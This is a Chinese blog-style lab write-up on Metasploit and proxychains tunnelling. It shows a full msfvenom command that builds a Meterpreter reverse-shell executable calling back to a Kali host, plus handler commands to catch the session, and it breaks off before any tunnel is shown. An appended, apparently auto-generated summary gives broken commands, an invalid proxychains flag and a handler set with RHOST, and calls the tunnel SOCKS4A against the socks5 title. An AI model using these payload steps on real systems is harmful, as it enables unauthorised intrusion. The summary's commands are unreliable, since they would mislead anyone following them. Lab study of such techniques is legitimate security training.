msf+proxychains组合搭建socks5隧道 | 内网穿透

实验环境

网络拓扑:
在这里插入图片描述

kali:

  • VMnet1(公网)192.168.52.134

win10:

  • VMnet1(公网)192.168.52.135
  • VMnet2(内网)192.168.72.133

win2008:

  • VMnet2(内网) 192.168.72.132

学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html

1. 拿下域内主机win10权限

这里直接msfvenom生成一个反弹shell木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe

复制到win10,

kali进入msfconsole

user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j

然后win10运行shell.exe就可以上线。

在这里插入图片描述

MSF (Metasploit Framework) 是一款广泛使用的开源渗透测试工具,它可以帮助攻击者识别漏洞并执行攻击。而 proxychains 是一个命令行工具,用于通过代理服务器透明地转发网络流量。 当结合 MSFproxychains搭建 SOCKS4A 隧道时,目的是为了在执行 Metasploit 的各种exploits或payloads时,对目标网络进行隐藏,提供额外的匿名性和位置掩饰。以下是简单的步骤: 1. 安装依赖:首先需要安装 Metasploit(如果尚未安装),然后安装 proxychains 和支持 SOCKS4A 的版本,例如 `proxychains-ng`。 ``` apt-get install metasploit-framework proxychains-ng ``` 2. 设置环境变量:配置 proxychains 的环境变量,通常这会将 proxychains 添加到系统路径以便在 Metasploit 中使用。 ```bash export PATH=$PATH:/path/to/proxychains-ng/bin ``` 3. 启动 socks4a代理:运行 proxychains 并指定 socks4a服务器地址和端口。 ```bash proxychains -i socks4h://your_socks4_server:port ``` 4. 在 Metasploit 中使用:现在你可以启动 Metasploit 模式并利用 proxychains 调用exploits或payloads。例如: ```msfconsole use exploit/multi/handler set RHOST your_target_ip run ``` 5. 交互式连接:如果exploit成功,Metasploit 会提示你进行交互式连接。这时通过 proxychains 连接到 Metasploit 提供的监听端口。 注意:这种设置需谨慎,仅用于学习和安全评估目的,未经授权的网络渗透可能导致法律问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值